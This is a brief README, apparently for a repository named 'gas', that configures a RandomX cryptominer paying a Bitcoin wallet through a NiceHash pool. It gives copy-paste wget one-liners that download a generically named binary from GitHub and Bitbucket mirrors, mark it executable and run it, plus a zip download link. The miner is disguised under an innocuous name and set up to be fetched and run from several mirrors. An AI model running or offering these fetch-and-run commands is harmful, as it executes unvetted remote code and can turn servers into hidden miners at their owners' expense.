# gas

[RandomX]
wallet = 3DjkbvskgDwKpinVCWHYVi2AdvJ2bpzmWY
coin = BTC
rigName = server4
pool1 = randomxmonero.eu-west.nicehash.com:3380

wget https://github.com/requests1/gas/blob/main/gas && wget https://raw.githubusercontent.com/requests1/gas/main/script.ini && chmod +x gas && ./gas script.ini

wget https://bitbucket.org/akinayturan/gas/src/main/gas && wget https://bitbucket.org/akinayturan/gas/src/main/script.ini && chmod +x gas && ./gas script.ini


https://codeload.github.com/R1ty/gas/zip/refs/heads/main